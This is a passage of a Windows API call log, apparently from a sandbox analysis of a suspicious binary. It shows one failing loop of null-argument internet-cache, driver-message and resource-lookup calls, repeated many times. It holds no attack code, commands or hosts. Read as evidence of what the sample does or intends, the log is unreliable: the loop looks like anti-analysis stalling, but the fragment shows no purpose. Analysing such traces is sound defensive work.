[0185.743] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.743] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.743] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.743] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.743] GetUserDefaultLangID () returned 0x409 [0185.743] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.743] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.743] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.743] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.743] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.743] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.743] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.743] GetUserDefaultLangID () returned 0x409 [0185.743] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.743] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.743] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.743] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.743] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.743] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.743] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.743] GetUserDefaultLangID () returned 0x409 [0185.743] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.743] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.743] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.743] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.743] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.743] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.743] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.743] GetUserDefaultLangID () returned 0x409 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.744] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.744] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.744] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.744] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.744] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.744] GetUserDefaultLangID () returned 0x409 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.744] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.744] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.744] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.744] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.744] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.744] GetUserDefaultLangID () returned 0x409 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.744] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.744] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.744] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.744] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.744] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.744] GetUserDefaultLangID () returned 0x409 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.744] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.744] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.744] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.744] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.744] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.744] GetUserDefaultLangID () returned 0x409 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.744] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.744] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.744] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.744] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.744] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.744] GetUserDefaultLangID () returned 0x409 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.744] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.745] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.745] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.745] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.745] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.745] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.745] GetUserDefaultLangID () returned 0x409 [0185.745] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.745] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.745] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.745] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.745] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.745] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.745] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.745] GetUserDefaultLangID () returned 0x409 [0185.745] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.745] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.745] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.745] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.745] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.745] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.745] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.745] GetUserDefaultLangID () returned 0x409 [0185.745] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.745] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.745] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.745] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.745] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.745] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.745] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.745] GetUserDefaultLangID () returned 0x409 [0185.745] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.745] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.745] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.745] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.745] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.745] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.745] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.745] GetUserDefaultLangID () returned 0x409 [0185.745] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.745] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.745] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.745] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.746] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.746] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.746] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.746] GetUserDefaultLangID () returned 0x409 [0185.746] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.746] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.746] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.746] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.746] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.746] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.746] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.746] GetUserDefaultLangID () returned 0x409 [0185.746] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.746] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.746] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.746] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.746] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.746] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.746] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.746] GetUserDefaultLangID () returned 0x409 [0185.746] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.746] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.746] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.746] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.746] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.746] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.746] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.746] GetUserDefaultLangID () returned 0x409 [0185.746] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.746] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.746] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.746] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.746] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.746] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.747] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.747] GetUserDefaultLangID () returned 0x409 [0185.747] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.747] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.747] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.747] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.747] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.747] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.747] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.747] GetUserDefaultLangID () returned 0x409 [0185.747] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.747] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.747] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.747] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.747] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.747] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.747] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.747] GetUserDefaultLangID () returned 0x409 [0185.747] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.747] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.747] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.747] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.747] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.747] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.747] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.747] GetUserDefaultLangID () returned 0x409 [0185.747] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.747] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.747] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.747] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.747] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.747] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.747] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.747] GetUserDefaultLangID () returned 0x409 [0185.747] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.747] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.747] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.747] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.747] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.747] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.747] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.747] GetUserDefaultLangID () returned 0x409 [0185.748] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.748] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.748] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.748] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.748] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.748] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.748] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.748] GetUserDefaultLangID () returned 0x409 [0185.748] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.748] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.748] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.748] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.748] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.748] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.748] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.748] GetUserDefaultLangID () returned 0x409 [0185.748] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.748] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.748] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.748] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.748] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.748] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.748] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.748] GetUserDefaultLangID () returned 0x409 [0185.748] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.748] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 